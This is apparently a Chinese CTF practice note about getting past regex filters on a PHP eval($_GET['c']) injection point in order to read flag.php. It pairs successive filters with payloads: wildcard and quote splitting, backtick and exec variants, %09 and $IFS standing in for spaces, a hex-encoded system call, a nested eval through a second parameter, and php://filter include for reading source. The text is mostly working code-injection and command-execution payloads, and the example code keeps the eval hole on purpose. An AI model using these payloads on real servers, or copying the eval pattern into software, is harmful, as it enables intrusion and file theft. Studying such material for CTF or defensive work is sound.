**************************************************************************************************************
GET传参-例题
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("过滤的内容", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
过滤的内容
/flag/i
?c=system("cat fla?.php");
?c=system("cat fla''g.php");
?c=system("cat fla\g.php");
?c=echo `nl fl''ag.php`;
?c=eval($_GET[1]);&1=system('cat flag.php');//也可tac
/flag|system|php/i
?c=passthru('tac f*');
?c=echo `tac *`;
?c=echo exec('nl fl?g.???');
?c=echo shell_exec('nl fl?g.???');//此函数与反引号异曲同工
?c=passthru("nl fl''ag.ph''p");//各种通配符的使用
?c=eval($_GET[1]);&1=system('cat flag.php');
/flag|system|php|cat|sort|shell|\.| |\'/i
?c=show_source(next(array_reverse(scandir(pos(localeconv())))));//预期
?c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
?c=print_r(`nl%09fl[abc]*`);
?c="\x73\x79\x73\x74\x65\x6d"("nl%09fl[a]*");//等价于system(),说明双引号会自动解析
?c=echo`strings%09f*`;//在对象文件或二进制文件中查找可打印的字符串
?c=echo`strings\$IFS\$9f*`//必须加转义字符
?c=passthru("nl%09`ls`");//空格%09绕过
?c=eval($_GET[1]);&1=system('cat flag.php');//还是可以
/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i
即过滤了flag,system,php,cat,sort,shell,.(点),
(空格),’(单引号),`(反引号),echo,;(分号),((左括号)
c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
或者POST:
?c=include$_POST[a]?>post:a=php://filter/read=convert.base64-encode/resource=flag.php
**************************************************************************************************************